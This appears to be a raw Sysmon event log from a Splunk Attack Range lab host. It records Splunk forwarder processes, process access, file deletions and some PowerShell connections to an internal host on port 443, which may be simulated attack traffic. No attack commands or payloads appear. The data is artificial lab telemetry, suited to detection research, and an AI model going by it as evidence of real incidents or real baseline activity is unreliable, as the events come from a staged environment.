21:57:41.673{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128219Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:41.673{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-8355-613A-CD96-03000000C801}2872C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035128218Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:41.673{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8355-613A-CD96-03000000C801}2872C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035128217Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:41.659{B81B27B7-8355-613A-CD96-03000000C801}2872C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035128216Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:41.541{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4D238F721F9D15AB2F1EDAEDDD908211,SHA256=E8AB7D2E3639691EBC649AF03B8E2106AC47B395382B991102F8ECF97CE5C19D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128215Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:41.540{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BD951A8CB7708BF4967018AC8E5D86CC,SHA256=33B15FF4307D2346A811EC063CB334DDBC0844A14B7D3664FCE3548C6D359FC4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035128214Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:41.239{B81B27B7-8355-613A-CC96-03000000C801}1400868C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128213Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:41.074{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8355-613A-CC96-03000000C801}1400C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128212Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:41.074{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128211Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:41.074{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128210Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:41.074{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128209Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:41.074{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128208Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:41.074{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-8355-613A-CC96-03000000C801}1400C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035128207Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:41.074{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8355-613A-CC96-03000000C801}1400C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035128206Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:41.060{B81B27B7-8355-613A-CC96-03000000C801}1400C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035128227Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:42.772{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98EF72E4135AAF53071F386613502000,SHA256=CBB098C5A16F4CDDE78917FC89FE30FBD563617B92BFF1F9B6BEA91D3F770775,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128226Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:42.688{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4D238F721F9D15AB2F1EDAEDDD908211,SHA256=E8AB7D2E3639691EBC649AF03B8E2106AC47B395382B991102F8ECF97CE5C19D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128230Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:08.639{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62122-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035128229Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:43.787{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90ABDC4948A882F44A7E0CC8C6842674,SHA256=E9ACAB3EDF090DF824E369376D7E6F2C48549225596E73C9FFC1F9A2A0657C51,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128228Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:43.518{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=EE821E7550840D83597BEFABC06D9B96,SHA256=9E2388BF0DEA1483B3B33CCEB630142FBA18E02FA9B43A7A9FFD6C36FA0EC14E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128237Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:09.316{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62123-false10.0.1.12-8000- 23542300x800000000000000035128236Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:44.801{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9F775DD460412CDF605039208ED4533,SHA256=62B95B6CD5AD2E382AC2A755FF9DC4FF9F114DA6470EC096E96482BBC08DDD2D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035128235Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:44.417{B81B27B7-5BF5-611D-6D04-00000000C801}50043344C:\Program Files\Mozilla Firefox\firefox.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+141a47|C:\Windows\System32\windows.storage.dll+141373|C:\Windows\System32\windows.storage.dll+1411f9|C:\Windows\System32\windows.storage.dll+53731|C:\Windows\System32\windows.storage.dll+53679|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\user32.DLL+121e4|C:\Windows\System32\user32.DLL+11b2c 10341000x800000000000000035128234Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:44.417{B81B27B7-5BF5-611D-6D04-00000000C801}50043344C:\Program Files\Mozilla Firefox\firefox.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1419b2|C:\Windows\System32\windows.storage.dll+141373|C:\Windows\System32\windows.storage.dll+1411f9|C:\Windows\System32\windows.storage.dll+53731|C:\Windows\System32\windows.storage.dll+53679|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\user32.DLL+121e4|C:\Windows\System32\user32.DLL+11b2c 10341000x800000000000000035128233Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:44.417{B81B27B7-5BF5-611D-6D04-00000000C801}50043344C:\Program Files\Mozilla Firefox\firefox.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+141997|C:\Windows\System32\windows.storage.dll+141373|C:\Windows\System32\windows.storage.dll+1411f9|C:\Windows\System32\windows.storage.dll+53731|C:\Windows\System32\windows.storage.dll+53679|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f 10341000x800000000000000035128232Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:44.417{B81B27B7-5BF5-611D-6D04-00000000C801}50043344C:\Program Files\Mozilla Firefox\firefox.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+141997|C:\Windows\System32\windows.storage.dll+141373|C:\Windows\System32\windows.storage.dll+1411f9|C:\Windows\System32\windows.storage.dll+53731|C:\Windows\System32\windows.storage.dll+53679|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06 23542300x800000000000000035128231Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:44.417{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RF724f3fd8.TMPMD5=80D2028940892EB0B825AD2D8C8015CA,SHA256=4DD349D08FFD72024F455B053513402E406D7132CA573412DC85EEBC52CFD7A3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128238Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:45.837{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53F66ECB575803B2F6361203B9C5C703,SHA256=94D71FEA0CDCD59426B6A512C0AF0395A9F5EA25B994DEB86214853AFFCACEB8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128239Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:46.853{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2D3C2EEB17B0B1100CBBC10FB653E60,SHA256=76A7D101E6A62830BAB9E64DCFFB1525EE3A694CC6A49685DFC06C040937325D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128240Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:47.883{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4793F5D2953C8CA2DECFA8C77B36E0A,SHA256=5C7EDF25A1510966EAEE92E54EE4BAEB8FEF3F17C8B779FE84DECE80C1D683BA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128242Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:48.933{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6BDDB7BF601FBD8E3E47CF1BD771E092,SHA256=EC106F862BCA2139648B88C77FE0216DAF652E0024CE896F38D6891F8276D6AB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128241Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:48.567{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=5EC5107482ADABF39483E6DBADAE84D7,SHA256=A793A9FD9FFB2AEBC64973B8E6AE8F1D67EC5E459DBC470FFC74AF88E250B298,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128243Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:49.951{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA68E0274E582632857B78222FA2546F,SHA256=2F3C99E35D35A78F97C6463E2B818EA8B8EC4878177FBF88DAEB4F85013D2FD9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128244Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:50.997{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D79C895D54742019C0657005A9312C6,SHA256=1840E56AD41292218250EDA59A8CB97FFE5A4D7DD800518C2C3F7343FB1956A6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128246Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:15.214{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62125-false10.0.1.12-8000- 354300x800000000000000035128245Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:14.649{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62124-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035128247Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:52.012{B81B27B7-4024-611D-7300-00000000C801}2188NT 